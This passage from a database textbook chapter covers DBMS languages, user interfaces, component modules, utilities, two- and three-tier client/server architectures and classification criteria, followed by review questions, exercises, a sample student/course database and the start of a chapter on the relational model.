the database and processes each separately. Therefore, it needs to use programming

35

Database System Concepts and Architecture

language constructs, such as looping, to retrieve and process each record from a set
of records. Low-level DMLs are also called record-at-a-time DMLs because of this
property. DL/1, a DML designed for the hierarchical model, is a low-level DML that
uses commands such as GET UNIQUE, GET NEXT, or GET NEXT WITHIN PARENT to
navigate from record to record within a hierarchy of records in the database. High-
level DMLs, such as SQL, can specify and retrieve many records in a single DML
statement; therefore, they are called set-at-a-time or set-oriented DMLs. A query in
a high-level DML often specifies which data to retrieve rather than how to retrieve it;
therefore, such languages are also called declarative.

Whenever DML commands, whether high level or low level, are embedded in a
general-purpose programming language, that language is called the host language
and the DML is called the data sublanguage.9 On the other hand, a high-level DML
used in a standalone interactive manner is called a query language. In general, both
retrieval and update commands of a high-level DML may be used interactively and
are hence considered part of the query language.10

Casual end users typically use a high-level query language to specify their requests,
whereas programmers use the DML in its embedded form. For naive and paramet-
ric users, there usually are user-friendly interfaces for interacting with the data-
base; these can also be used by casual users or others who do not want to learn the
details of a high-level query language. We discuss these types of interfaces next.

3.2 DBMS Interfaces
User-friendly interfaces provided by a DBMS may include the following:

Menu-Based Interfaces for Web Clients or Browsing. These interfaces pre-
sent the user with lists of options (called menus) that lead the user through the for-
mulation of a request. Menus do away with the need to memorize the specific
commands and syntax of a query language; rather, the query is composed step-by-
step by picking options from a menu that is displayed by the system. Pull-down
menus are a very popular technique in Web-based user interfaces. They are also
often used in browsing interfaces, which allow a user to look through the contents
of a database in an exploratory and unstructured manner.

Forms-Based Interfaces. A forms-based interface displays a form to each user.
Users can fill out all of the form entries to insert new data, or they can fill out only
certain entries, in which case the DBMS will retrieve matching data for the remain-
ing entries. Forms are usually designed and programmed for naive users as inter-
faces to canned transactions. Many DBMSs have forms specification languages,

9In object databases, the host and data sublanguages typically form one integrated language—for exam-
ple, C++ with some extensions to support database functionality. Some relational systems also provide
integrated languages—for example, Oracle’s PL/SQL.
10According to the English meaning of the word query, it should really be used to describe retrievals only,
not updates.

36

Database System Concepts and Architecture

which are special languages that help programmers specify such forms. SQL*Forms
is a form-based language that specifies queries using a form designed in conjunc-
tion with the relational database schema. Oracle Forms is a component of the
Oracle product suite that provides an extensive set of features to design and build
applications using forms. Some systems have utilities that define a form by letting
the end user interactively construct a sample form on the screen.

Graphical User Interfaces. A GUI typically displays a schema to the user in dia-
grammatic form. The user then can specify a query by manipulating the diagram. In
many cases, GUIs utilize both menus and forms. Most GUIs use a pointing device,
such as a mouse, to select certain parts of the displayed schema diagram.

Natural Language Interfaces. These interfaces accept requests written in
English or some other language and attempt to understand them. A natural lan-
guage interface usually has its own schema, which is similar to the database concep-
tual schema, as well as a dictionary of important words. The natural language
interface refers to the words in its schema, as well as to the set of standard words in
its dictionary, to interpret the request. If the interpretation is successful, the inter-
face generates a high-level query corresponding to the natural language request and
submits it to the DBMS for processing; otherwise, a dialogue is started with the user
to clarify the request. The capabilities of natural language interfaces have not
advanced rapidly. Today, we see search engines that accept strings of natural lan-
guage (like English or Spanish) words and match them with documents at specific
sites (for local search engines) or Web pages on the Web at large (for engines like
Google or Ask). They use predefined indexes on words and use ranking functions to
retrieve and present resulting documents in a decreasing degree of match. Such
“free form” textual query interfaces are not yet common in structured relational or
legacy model databases, although a research area called keyword-based querying
has emerged recently for relational databases.

Speech Input and Output. Limited use of speech as an input query and speech
as an answer to a question or result of a request is becoming commonplace.
Applications with limited vocabularies such as inquiries for telephone directory,
flight arrival/departure, and credit card account information are allowing speech
for input and output to enable customers to access this information. The speech
input is detected using a library of predefined words and used to set up the param-
eters that are supplied to the queries. For output, a similar conversion from text or
numbers into speech takes place.

Interfaces for Parametric Users. Parametric users, such as bank tellers, often
have a small set of operations that they must perform repeatedly. For example, a
teller is able to use single function keys to invoke routine and repetitive transactions
such as account deposits or withdrawals, or balance inquiries. Systems analysts and
programmers design and implement a special interface for each known class of
naive users. Usually a small set of abbreviated commands is included, with the goal
of minimizing the number of keystrokes required for each request. For example,

37

Database System Concepts and Architecture

function keys in a terminal can be programmed to initiate various commands. This
allows the parametric user to proceed with a minimal number of keystrokes.

Interfaces for the DBA. Most database systems contain privileged commands
that can be used only by the DBA staff. These include commands for creating
accounts, setting system parameters, granting account authorization, changing a
schema, and reorganizing the storage structures of a database.

4 The Database System Environment
A DBMS is a complex software system. In this section we discuss the types of soft-
ware components that constitute a DBMS and the types of computer system soft-
ware with which the DBMS interacts.

4.1 DBMS Component Modules
Figure 3 illustrates, in a simplified form, the typical DBMS components. The figure
is divided into two parts. The top part of the figure refers to the various users of the
database environment and their interfaces. The lower part shows the internals of the
DBMS responsible for storage of data and processing of transactions.

The database and the DBMS catalog are usually stored on disk. Access to the disk is
controlled primarily by the operating system (OS), which schedules disk
read/write. Many DBMSs have their own buffer management module to schedule
disk read/write, because this has a considerable effect on performance. Reducing
disk read/write improves performance considerably. A higher-level stored data
manager module of the DBMS controls access to DBMS information that is stored
on disk, whether it is part of the database or the catalog.

Let us consider the top part of Figure 3 first. It shows interfaces for the DBA staff,
casual users who work with interactive interfaces to formulate queries, application
programmers who create programs using some host programming languages, and
parametric users who do data entry work by supplying parameters to predefined
transactions. The DBA staff works on defining the database and tuning it by making
changes to its definition using the DDL and other privileged commands.

The DDL compiler processes schema definitions, specified in the DDL, and stores
descriptions of the schemas (meta-data) in the DBMS catalog. The catalog includes
information such as the names and sizes of files, names and data types of data items,
storage details of each file, mapping information among schemas, and constraints.
In addition, the catalog stores many other types of information that are needed by
the DBMS modules, which can then look up the catalog information as needed.

Casual users and persons with occasional need for information from the database
interact using some form of interface, which we call the interactive query interface
in Figure 3. We have not explicitly shown any menu-based or form-based interac-
tion that may be used to generate the interactive query automatically. These queries
are parsed and validated for correctness of the query syntax, the names of files and

38

Database System Concepts and Architecture

Query
Compiler

Runtime
Database
Processor

Precompiler

System
Catalog/

Data
Dictionary

Query
Optimizer

DML
Compiler

Host
Language
Compiler

Concurrency Control/
Backup/Recovery

Subsystems

Stored
Data

Manager

Compiled
Transactions

Stored Database

DBA Commands,
Queries, and Transactions

Input/Output
from DatabaseQuery and Transaction

Execution:

DDL
Compiler

DDL
Statements

Privileged
Commands

Interactive
Query

Application
Programs

DBA Staff Casual Users Application
Programmers

Parametric UsersUsers:

Figure 3
Component modules of a DBMS and their interactions.

data elements, and so on by a query compiler that compiles them into an internal
form. This internal query is subjected to query optimization. Among other things,
the query optimizer is concerned with the rearrangement and possible reordering
of operations, elimination of redundancies, and use of correct algorithms and
indexes during execution. It consults the system catalog for statistical and other
physical information about the stored data and generates executable code that per-
forms the necessary operations for the query and makes calls on the runtime
processor.

39

Database System Concepts and Architecture

Application programmers write programs in host languages such as Java, C, or C++
that are submitted to a precompiler. The precompiler extracts DML commands
from an application program written in a host programming language. These com-
mands are sent to the DML compiler for compilation into object code for database
access. The rest of the program is sent to the host language compiler. The object
codes for the DML commands and the rest of the program are linked, forming a
canned transaction whose executable code includes calls to the runtime database
processor. Canned transactions are executed repeatedly by parametric users, who
simply supply the parameters to the transactions. Each execution is considered to be
a separate transaction. An example is a bank withdrawal transaction where the
account number and the amount may be supplied as parameters.

In the lower part of Figure 3, the runtime database processor executes (1) the privi-
leged commands, (2) the executable query plans, and (3) the canned transactions
with runtime parameters. It works with the system catalog and may update it with
statistics. It also works with the stored data manager, which in turn uses basic oper-
ating system services for carrying out low-level input/output (read/write) operations
between the disk and main memory. The runtime database processor handles other
aspects of data transfer, such as management of buffers in the main memory. Some
DBMSs have their own buffer management module while others depend on the OS
for buffer management. We have shown concurrency control and backup and recov-
ery systems separately as a module in this figure. They are integrated into the work-
ing of the runtime database processor for purposes of transaction management.

It is now common to have the client program that accesses the DBMS running on a
separate computer from the computer on which the database resides. The former is
called the client computer running a DBMS client software and the latter is called
the database server. In some cases, the client accesses a middle computer, called the
application server, which in turn accesses the database server. We elaborate on this
topic in Section 5.

Figure 3 is not meant to describe a specific DBMS; rather, it illustrates typical DBMS
modules. The DBMS interacts with the operating system when disk accesses—to the
database or to the catalog—are needed. If the computer system is shared by many
users, the OS will schedule DBMS disk access requests and DBMS processing along
with other processes. On the other hand, if the computer system is mainly dedicated
to running the database server, the DBMS will control main memory buffering of
disk pages. The DBMS also interfaces with compilers for general-purpose host pro-
gramming languages, and with application servers and client programs running on
separate machines through the system network interface.

4.2 Database System Utilities
In addition to possessing the software modules just described, most DBMSs have
database utilities that help the DBA manage the database system. Common utilities
have the following types of functions:

■ Loading. A loading utility is used to load existing data files—such as text
files or sequential files—into the database. Usually, the current (source) for-

40

Database System Concepts and Architecture

mat of the data file and the desired (target) database file structure are speci-
fied to the utility, which then automatically reformats the data and stores it
in the database. With the proliferation of DBMSs, transferring data from one
DBMS to another is becoming common in many organizations. Some ven-
dors are offering products that generate the appropriate loading programs,
given the existing source and target database storage descriptions (internal
schemas). Such tools are also called conversion tools. For the hierarchical
DBMS called IMS (IBM) and for many network DBMSs including IDMS
(Computer Associates), SUPRA (Cincom), and IMAGE (HP), the vendors or
third-party companies are making a variety of conversion tools available
(e.g., Cincom’s SUPRA Server SQL) to transform data into the relational
model.

■ Backup. A backup utility creates a backup copy of the database, usually by
dumping the entire database onto tape or other mass storage medium. The
backup copy can be used to restore the database in case of catastrophic disk
failure. Incremental backups are also often used, where only changes since
the previous backup are recorded. Incremental backup is more complex, but
saves storage space.

■ Database storage reorganization. This utility can be used to reorganize a set
of database files into different file organizations, and create new access paths
to improve performance.

■ Performance monitoring. Such a utility monitors database usage and pro-
vides statistics to the DBA. The DBA uses the statistics in making decisions
such as whether or not to reorganize files or whether to add or drop indexes
to improve performance.

Other utilities may be available for sorting files, handling data compression,
monitoring access by users, interfacing with the network, and performing other
functions.

4.3 Tools, Application Environments,
and Communications Facilities

Other tools are often available to database designers, users, and the DBMS. CASE
tools11 are used in the design phase of database systems. Another tool that can be
quite useful in large organizations is an expanded data dictionary (or data reposi-
tory) system. In addition to storing catalog information about schemas and con-
straints, the data dictionary stores other information, such as design decisions,
usage standards, application program descriptions, and user information. Such a
system is also called an information repository. This information can be accessed
directly by users or the DBA when needed. A data dictionary utility is similar to the
DBMS catalog, but it includes a wider variety of information and is accessed mainly
by users rather than by the DBMS software.

11Although CASE stands for computer-aided software engineering, many CASE tools are used primarily
for database design.

41

Database System Concepts and Architecture

Application development environments, such as PowerBuilder (Sybase) or
JBuilder (Borland), have been quite popular. These systems provide an environment
for developing database applications and include facilities that help in many facets
of database systems, including database design, GUI development, querying and
updating, and application program development.

The DBMS also needs to interface with communications software, whose function
is to allow users at locations remote from the database system site to access the data-
base through computer terminals, workstations, or personal computers. These are
connected to the database site through data communications hardware such as
Internet routers, phone lines, long-haul networks, local networks, or satellite com-
munication devices. Many commercial database systems have communication
packages that work with the DBMS. The integrated DBMS and data communica-
tions system is called a DB/DC system. In addition, some distributed DBMSs are
physically distributed over multiple machines. In this case, communications net-
works are needed to connect the machines. These are often local area networks
(LANs), but they can also be other types of networks.

5 Centralized and Client/Server Architectures
for DBMSs

5.1 Centralized DBMSs Architecture
Architectures for DBMSs have followed trends similar to those for general computer
system architectures. Earlier architectures used mainframe computers to provide
the main processing for all system functions, including user application programs
and user interface programs, as well as all the DBMS functionality. The reason was
that most users accessed such systems via computer terminals that did not have pro-
cessing power and only provided display capabilities. Therefore, all processing was
performed remotely on the computer system, and only display information and
controls were sent from the computer to the display terminals, which were con-
nected to the central computer via various types of communications networks.

As prices of hardware declined, most users replaced their terminals with PCs and
workstations. At first, database systems used these computers similarly to how they
had used display terminals, so that the DBMS itself was still a centralized DBMS in
which all the DBMS functionality, application program execution, and user inter-
face processing were carried out on one machine. Figure 4 illustrates the physical
components in a centralized architecture. Gradually, DBMS systems started to
exploit the available processing power at the user side, which led to client/server
DBMS architectures.

5.2 Basic Client/Server Architectures
First, we discuss client/server architecture in general, then we see how it is applied to
DBMSs. The client/server architecture was developed to deal with computing envi-
ronments in which a large number of PCs, workstations, file servers, printers, data-

42

Database System Concepts and Architecture

Display
Monitor

Display
Monitor

Network

Software

Hardware/Firmware

Operating System

Display
Monitor

Application
Programs

DBMS

Controller

CPU

Controller

. . .

. . .

. . .

Controller

Memory Disk
I/O Devices

(Printers,
Tape Drives, . . .)

Compilers

Text
Editors

Terminal
Display Control

System Bus

Terminals . . .

. . .

Figure 4
A physical centralized
architecture.

base servers, Web servers, e-mail servers, and other software and equipment are
connected via a network. The idea is to define specialized servers with specific
functionalities. For example, it is possible to connect a number of PCs or small
workstations as clients to a file server that maintains the files of the client machines.
Another machine can be designated as a printer server by being connected to vari-
ous printers; all print requests by the clients are forwarded to this machine. Web
servers or e-mail servers also fall into the specialized server category. The resources
provided by specialized servers can be accessed by many client machines. The client
machines provide the user with the appropriate interfaces to utilize these servers, as
well as with local processing power to run local applications. This concept can be
carried over to other software packages, with specialized programs—such as a CAD
(computer-aided design) package—being stored on specific server machines and
being made accessible to multiple clients. Figure 5 illustrates client/server architec-
ture at the logical level; Figure 6 is a simplified diagram that shows the physical
architecture. Some machines would be client sites only (for example, diskless work-
stations or workstations/PCs with disks that have only client software installed).

Client Client Client

Print
Server

DBMS
Server

File
Server

. . .

. . .

Network

Figure 5
Logical two-tier
client/server
architecture.

43

Database System Concepts and Architecture

Client CLIENT

Site 2

Client
with Disk

Client

Site 1

Diskless
Client

Server

Site 3

Server

Communication
Network

Site n

Server
and Client

. . .

Client

Server

Figure 6
Physical two-tier client/server
architecture.

Other machines would be dedicated servers, and others would have both client and
server functionality.

The concept of client/server architecture assumes an underlying framework that
consists of many PCs and workstations as well as a smaller number of mainframe
machines, connected via LANs and other types of computer networks. A client in
this framework is typically a user machine that provides user interface capabilities
and local processing. When a client requires access to additional functionality—
such as database access—that does not exist at that machine, it connects to a server
that provides the needed functionality. A server is a system containing both hard-
ware and software that can provide services to the client machines, such as file
access, printing, archiving, or database access. In general, some machines install
only client software, others only server software, and still others may include both
client and server software, as illustrated in Figure 6. However, it is more common
that client and server software usually run on separate machines. Two main types of
basic DBMS architectures were created on this underlying client/server framework:
two-tier and three-tier.12 We discuss them next.

5.3 Two-Tier Client/Server Architectures for DBMSs
In relational database management systems (RDBMSs), many of which started as
centralized systems, the system components that were first moved to the client side
were the user interface and application programs. Because SQL provided a standard
language for RDBMSs, this created a logical dividing point between client and

12There are many other variations of client/server architectures. We discuss the two most basic ones
here.

44

Database System Concepts and Architecture

server. Hence, the query and transaction functionality related to SQL processing
remained on the server side. In such an architecture, the server is often called a
query server or transaction server because it provides these two functionalities. In
an RDBMS, the server is also often called an SQL server.

The user interface programs and application programs can run on the client side.
When DBMS access is required, the program establishes a connection to the DBMS
(which is on the server side); once the connection is created, the client program can
communicate with the DBMS. A standard called Open Database Connectivity
(ODBC) provides an application programming interface (API), which allows
client-side programs to call the DBMS, as long as both client and server machines
have the necessary software installed. Most DBMS vendors provide ODBC drivers
for their systems. A client program can actually connect to several RDBMSs and
send query and transaction requests using the ODBC API, which are then processed
at the server sites. Any query results are sent back to the client program, which can
process and display the results as needed. A related standard for the Java program-
ming language, called JDBC, has also been defined. This allows Java client programs
to access one or more DBMSs through a standard interface.

The different approach to two-tier client/server architecture was taken by some
object-oriented DBMSs, where the software modules of the DBMS were divided
between client and server in a more integrated way. For example, the server level
may include the part of the DBMS software responsible for handling data storage on
disk pages, local concurrency control and recovery, buffering and caching of disk
pages, and other such functions. Meanwhile, the client level may handle the user
interface; data dictionary functions; DBMS interactions with programming lan-
guage compilers; global query optimization, concurrency control, and recovery
across multiple servers; structuring of complex objects from the data in the buffers;
and other such functions. In this approach, the client/server interaction is more
tightly coupled and is done internally by the DBMS modules—some of which reside
on the client and some on the server—rather than by the users/programmers. The
exact division of functionality can vary from system to system. In such a
client/server architecture, the server has been called a data server because it pro-
vides data in disk pages to the client. This data can then be structured into objects
for the client programs by the client-side DBMS software.

The architectures described here are called two-tier architectures because the soft-
ware components are distributed over two systems: client and server. The advan-
tages of this architecture are its simplicity and seamless compatibility with existing
systems. The emergence of the Web changed the roles of clients and servers, leading
to the three-tier architecture.

5.4 Three-Tier and n-Tier Architectures
for Web Applications

Many Web applications use an architecture called the three-tier architecture, which
adds an intermediate layer between the client and the database server, as illustrated
in Figure 7(a).

45

Database System Concepts and Architecture

GUI,
Web Interface

Client

Application Server
or

Web Server

Database
Server

Application
Programs,

Web Pages

Database
Management

System

Presentation
Layer

Business
Logic Layer

Database
Services

Layer

(a) (b)

Figure 7
Logical three-tier client/server
architecture, with a couple of
commonly used nomenclatures.

This intermediate layer or middle tier is called the application server or the Web
server, depending on the application. This server plays an intermediary role by run-
ning application programs and storing business rules (procedures or constraints)
that are used to access data from the database server. It can also improve database
security by checking a client’s credentials before forwarding a request to the data-
base server. Clients contain GUI interfaces and some additional application-specific
business rules. The intermediate server accepts requests from the client, processes
the request and sends database queries and commands to the database server, and
then acts as a conduit for passing (partially) processed data from the database server
to the clients, where it may be processed further and filtered to be presented to users
in GUI format. Thus, the user interface, application rules, and data access act as the
three tiers. Figure 7(b) shows another architecture used by database and other
application package vendors. The presentation layer displays information to the
user and allows data entry. The business logic layer handles intermediate rules and
constraints before data is passed up to the user or down to the DBMS. The bottom
layer includes all data management services. The middle layer can also act as a Web
server, which retrieves query results from the database server and formats them into
dynamic Web pages that are viewed by the Web browser at the client side.

Other architectures have also been proposed. It is possible to divide the layers
between the user and the stored data further into finer components, thereby giving
rise to n-tier architectures, where n may be four or five tiers. Typically, the business
logic layer is divided into multiple layers. Besides distributing programming and
data throughout a network, n-tier applications afford the advantage that any one
tier can run on an appropriate processor or operating system platform and can be
handled independently. Vendors of ERP (enterprise resource planning) and CRM
(customer relationship management) packages often use a middleware layer, which
accounts for the front-end modules (clients) communicating with a number of
back-end databases (servers).

46

Database System Concepts and Architecture

Advances in encryption and decryption technology make it safer to transfer sensi-
tive data from server to client in encrypted form, where it will be decrypted. The lat-
ter can be done by the hardware or by advanced software. This technology gives
higher levels of data security, but the network security issues remain a major con-
cern. Various technologies for data compression also help to transfer large amounts
of data from servers to clients over wired and wireless networks.

6 Classification of Database
Management Systems

Several criteria are normally used to classify DBMSs. The first is the data model on
which the DBMS is based. The main data model used in many current commercial
DBMSs is the relational data model. The object data model has been implemented
in some commercial systems but has not had widespread use. Many legacy applica-
tions still run on database systems based on the hierarchical and network data
models. Examples of hierarchical DBMSs include IMS (IBM) and some other sys-
tems like System 2K (SAS Inc.) and TDMS. IMS is still used at governmental and
industrial installations, including hospitals and banks, although many of its users
have converted to relational systems. The network data model was used by many
vendors and the resulting products like IDMS (Cullinet—now Computer
Associates), DMS 1100 (Univac—now Unisys), IMAGE (Hewlett-Packard), VAX-
DBMS (Digital—then Compaq and now HP), and SUPRA (Cincom) still have a fol-
lowing and their user groups have their own active organizations. If we add IBM’s
popular VSAM file system to these, we can easily say that a reasonable percentage of
worldwide-computerized data is still in these so-called legacy database systems.

The relational DBMSs are evolving continuously, and, in particular, have been
incorporating many of the concepts that were developed in object databases. This
has led to a new class of DBMSs called object-relational DBMSs. We can categorize
DBMSs based on the data model: relational, object, object-relational, hierarchical,
network, and other.

More recently, some experimental DBMSs are based on the XML (eXtended
Markup Language) model, which is a tree-structured (hierarchical) data model.
These have been called native XML DBMSs. Several commercial relational DBMSs
have added XML interfaces and storage to their products.

The second criterion used to classify DBMSs is the number of users supported by
the system. Single-user systems support only one user at a time and are mostly used
with PCs. Multiuser systems, which include the majority of DBMSs, support con-
current multiple users.

The third criterion is the number of sites over which the database is distributed. A
DBMS is centralized if the data is stored at a single computer site. A centralized
DBMS can support multiple users, but the DBMS and the database reside totally at
a single computer site. A distributed DBMS (DDBMS) can have the actual database
and DBMS software distributed over many sites, connected by a computer network.
Homogeneous DDBMSs use the same DBMS software at all the sites, whereas

47

Database System Concepts and Architecture

heterogeneous DDBMSs can use different DBMS software at each site. It is also
possible to develop middleware software to access several autonomous preexisting
databases stored under heterogeneousDBMSs. This leads to a federated DBMS (or
multidatabase system), in which the participating DBMSs are loosely coupled and
have a degree of local autonomy. Many DDBMSs use client-server architecture, as
we described in Section 5.

The fourth criterion is cost. It is difficult to propose a classification of DBMSs based
on cost. Today we have open source (free) DBMS products like MySQL and
PostgreSQL that are supported by third-party vendors with additional services. The
main RDBMS products are available as free examination 30-day copy versions as
well as personal versions, which may cost under $100 and allow a fair amount of
functionality. The giant systems are being sold in modular form with components
to handle distribution, replication, parallel processing, mobile capability, and so on,
and with a large number of parameters that must be defined for the configuration.
Furthermore, they are sold in the form of licenses—site licenses allow unlimited use
of the database system with any number of copies running at the customer site.
Another type of license limits the number of concurrent users or the number of
user seats at a location. Standalone single user versions of some systems like
Microsoft Access are sold per copy or included in the overall configuration of a
desktop or laptop. In addition, data warehousing and mining features, as well as
support for additional data types, are made available at extra cost. It is possible to
pay millions of dollars for the installation and maintenance of large database sys-
tems annually.

We can also classify a DBMS on the basis of the types of access path options for
storing files. One well-known family of DBMSs is based on inverted file structures.
Finally, a DBMS can be general purpose or special purpose. When performance is
a primary consideration, a special-purpose DBMS can be designed and built for a
specific application; such a system cannot be used for other applications without
major changes. Many airline reservations and telephone directory systems devel-
oped in the past are special-purpose DBMSs. These fall into the category of online
transaction processing (OLTP) systems, which must support a large number of
concurrent transactions without imposing excessive delays.

Let us briefly elaborate on the main criterion for classifying DBMSs: the data model.
The basic relational data model represents a database as a collection of tables,
where each table can be stored as a separate file. The database in Figure 1.2 resem-
bles a relational representation. Most relational databases use the high-level query
language called SQL and support a limited form of user views.

The object data model defines a database in terms of objects, their properties, and
their operations. Objects with the same structure and behavior belong to a class,
and classes are organized into hierarchies (or acyclic graphs). The operations of
each class are specified in terms of predefined procedures called methods.
Relational DBMSs have been extending their models to incorporate object database

48

Database System Concepts and Architecture

concepts and other capabilities; these systems are referred to as object-relational or
extended relational systems.

The XML model has emerged as a standard for exchanging data over the Web, and
has been used as a basis for implementing several prototype native XML systems.
XML uses hierarchical tree structures. It combines database concepts with concepts
from document representation models. Data is represented as elements; with the
use of tags, data can be nested to create complex hierarchical structures. This model
conceptually resembles the object model but uses different terminology. XML capa-
bilities have been added to many commercial DBMS products.

Two older, historically important data models, now known as legacy data models,
are the network and hierarchical models. The network model represents data as
record types and also represents a limited type of 1:N relationship, called a set type.
A 1:N, or one-to-many, relationship relates one instance of a record to many record
instances using some pointer linking mechanism in these models. Figure 8 shows a
network schema diagram for the database of Figure 1, where record types are shown
as rectangles and set types are shown as labeled directed arrows.

The network model, also known as the CODASYL DBTG model,13 has an associated
record-at-a-time language that must be embedded in a host programming lan-
guage. The network DML was proposed in the 1971 Database Task Group (DBTG)
Report as an extension of the COBOL language. It provides commands for locating
records directly (e.g., FIND ANY USING , or FIND
DUPLICATE USING ). It has commands to support tra-
versals within set-types (e.g., GET OWNER, GET {FIRST, NEXT, LAST} MEMBER
WITHIN WHERE ). It also has commands to store new data

GRADE_REPORT

SECTION

COURSE_OFFERINGS

STUDENT_GRADES
HAS_A

IS_A

PREREQUISITE

SECTION_GRADES

STUDENT COURSE Figure 8
The schema of Figure
1 in network model
notation.

13CODASYL DBTG stands for Conference on Data Systems Languages Database Task Group, which is
the committee that specified the network model and its language.

49

Database System Concepts and Architecture

(e.g., STORE ) and to make it part of a set type (e.g., CONNECT
TO ). The language also handles many additional consid-
erations, such as the currency of record types and set types, which are defined by the
current position of the navigation process within the database. It is prominently
used by IDMS, IMAGE, and SUPRA DBMSs today.

The hierarchical model represents data as hierarchical tree structures. Each hierar-
chy represents a number of related records. There is no standard language for the
hierarchical model. A popular hierarchical DML is DL/1 of the IMS system. It dom-
inated the DBMS market for over 20 years between 1965 and 1985 and is still a
widely used DBMS worldwide, holding a large percentage of data in governmental,
health care, and banking and insurance databases. Its DML, called DL/1, was a de
facto industry standard for a long time. DL/1 has commands to locate a record (e.g.,
GET { UNIQUE, NEXT} WHERE ). It has navigational
facilities to navigate within hierarchies (e.g., GET NEXT WITHIN PARENT or GET
{FIRST, NEXT} PATH WHERE ). It has
appropriate facilities to store and update records (e.g., INSERT ,
REPLACE ). Currency issues during navigation are also handled with
additional features in the language.

7 Summary
In this chapter we introduced the main concepts used in database systems. We
defined a data model and we distinguished three main categories:

■ High-level or conceptual data models (based on entities and relationships)

■ Low-level or physical data models

■ Representational or implementation data models (record-based, object-
oriented)

We distinguished the schema, or description of a database, from the database itself.
The schema does not change very often, whereas the database state changes every
time data is inserted, deleted, or modified. Then we described the three-schema
DBMS architecture, which allows three schema levels:

■ An internal schema describes the physical storage structure of the database.

■ A conceptual schema is a high-level description of the whole database.

■ External schemas describe the views of different user groups.

A DBMS that cleanly separates the three levels must have mappings between the
schemas to transform requests and query results from one level to the next. Most
DBMSs do not separate the three levels completely. We used the three-schema archi-
tecture to define the concepts of logical and physical data independence.

50

Database System Concepts and Architecture

Then we discussed the main types of languages and interfaces that DBMSs support.
A data definition language (DDL) is used to define the database conceptual schema.
In most DBMSs, the DDL also defines user views and, sometimes, storage struc-
tures; in other DBMSs, separate languages or functions exist for specifying storage
structures. This distinction is fading away in today’s relational implementations,
with SQL serving as a catchall language to perform multiple roles, including view
definition. The storage definition part (SDL) was included in SQL’s early versions,
but is now typically implemented as special commands for the DBA in relational
DBMSs. The DBMS compiles all schema definitions and stores their descriptions in
the DBMS catalog.

A data manipulation language (DML) is used for specifying database retrievals and
updates. DMLs can be high level (set-oriented, nonprocedural) or low level (record-
oriented, procedural). A high-level DML can be embedded in a host programming
language, or it can be used as a standalone language; in the latter case it is often
called a query language.

We discussed different types of interfaces provided by DBMSs, and the types of
DBMS users with which each interface is associated. Then we discussed the database
system environment, typical DBMS software modules, and DBMS utilities for help-
ing users and the DBA staff perform their tasks. We continued with an overview of
the two-tier and three-tier architectures for database applications, progressively
moving toward n-tier, which are now common in many applications, particularly
Web database applications.

Finally, we classified DBMSs according to several criteria: data model, number of
users, number of sites, types of access paths, and cost. We discussed the availability
of DBMSs and additional modules—from no cost in the form of open source soft-
ware, to configurations that annually cost millions to maintain. We also pointed out
the variety of licensing arrangements for DBMS and related products. The main
classification of DBMSs is based on the data model. We briefly discussed the main
data models used in current commercial DBMSs.

Review Questions
1. Define the following terms: data model, database schema, database state,

internal schema, conceptual schema, external schema, data independence,
DDL, DML, SDL, VDL, query language, host language, data sublanguage,
database utility, catalog, client/server architecture, three-tier architecture, and
n-tier architecture.

2. Discuss the main categories of data models. What are the basic differences
between the relational model, the object model, and the XML model?

3. What is the difference between a database schema and a database state?

4. Describe the three-schema architecture. Why do we need mappings between
schema levels? How do different schema definition languages support this
architecture?

51

Database System Concepts and Architecture

5. What is the difference between logical data independence and physical data
independence? Which one is harder to achieve? Why?

6. What is the difference between procedural and nonprocedural DMLs?

7. Discuss the different types of user-friendly interfaces and the types of users
who typically use each.

8. With what other computer system software does a DBMS interact?

9. What is the difference between the two-tier and three-tier client/server
architectures?

10. Discuss some types of database utilities and tools and their functions.

11. What is the additional functionality incorporated in n-tier architecture
(n > 3)?

Exercises
12. Think of different users for the database shown in Figure A.1. What types of

applications would each user need? To which user category would each
belong, and what type of interface would each need?

13. Choose a database application with which you are familiar. Design a schema
and show a sample database for that application, using the notation of
Figures A.1 and 1. What types of additional information and constraints
would you like to represent in the schema? Think of several users of your
database, and design a view for each.

14. If you were designing a Web-based system to make airline reservations and
sell airline tickets, which DBMS architecture would you choose from Section
5? Why? Why would the other architectures not be a good choice?

15. Consider Figure 1. In addition to constraints relating the values of columns
in one table to columns in another table, there are also constraints that
impose restrictions on values in a column or a combination of columns
within a table. One such constraint dictates that a column or a group of
columns must be unique across all rows in the table. For example, in the
STUDENT table, the Student_number column must be unique (to prevent two
different students from having the same Student_number). Identify the col-
umn or the group of columns in the other tables that must be unique across
all rows in the table.

52

Database System Concepts and Architecture

Selected Bibliography
Many database textbooks, including Date (2004), Silberschatz et al. (2006),
Ramakrishnan and Gehrke (2003), Garcia-Molina et al. (2000, 2009), and Abiteboul
et al. (1995), provide a discussion of the various database concepts presented here.
Tsichritzis and Lochovsky (1982) is an early textbook on data models. Tsichritzis
and Klug (1978) and Jardine (1977) present the three-schema architecture, which
was first suggested in the DBTG CODASYL report (1971) and later in an American
National Standards Institute (ANSI) report (1975). An in-depth analysis of the rela-
tional data model and some of its possible extensions is given in Codd (1990). The
proposed standard for object-oriented databases is described in Cattell et al. (2000).
Many documents describing XML are available on the Web, such as XML (2005).

Examples of database utilities are the ETI Connect, Analyze and Transform tools
(http://www.eti.com) and the database administration tool, DBArtisan, from
Embarcadero Technologies (http://www.embarcadero.com).

53

Database System Concepts and Architecture

Name Student_number Class Major

Smith 17 1 CS

Brown 8 2 CS

STUDENT

Course_name Course_number Credit_hours Department

Intro to Computer Science CS1310 4 CS

Data Structures CS3320 4 CS

Discrete Mathematics MATH2410 3 MATH

Database CS3380 3 CS

COURSE

Section_identifier Course_number Semester Year Instructor

85 MATH2410 Fall 07 King

92 CS1310 Fall 07 Anderson

102 CS3320 Spring 08 Knuth

112 MATH2410 Fall 08 Chang

119 CS1310 Fall 08 Anderson

135 CS3380 Fall 08 Stone

SECTION

Student_number Section_identifier Grade

17 112 B

17 119 C

8 85 A

8 92 A

8 102 B

8 135 A

GRADE_REPORT

Course_number Prerequisite_number

CS3380 CS3320

CS3380 MATH2410

CS3320 CS1310

PREREQUISITE

Figure A.1
A database that stores
student and course
information.

54

The Relational Data Model and
Relational Database Constraints

The relational data model was first introduced byTed Codd of IBM Research in 1970 in a classic
paper (Codd 1970), and it attracted immediate attention due to its simplicity and
mathematical foundation. The model uses the concept of a mathematical relation—
which looks somewhat like a table of values—as its basic building block, and has its
theoretical basis in set theory and first-order predicate logic. In this chapter we dis-
cuss the basic characteristics of the model and its constraints.

The first commercial implementations of the relational model became available in
the early 1980s, such as the SQL/DS system on the MVS operating system by IBM
and the Oracle DBMS. Since then, the model has been implemented in a large num-
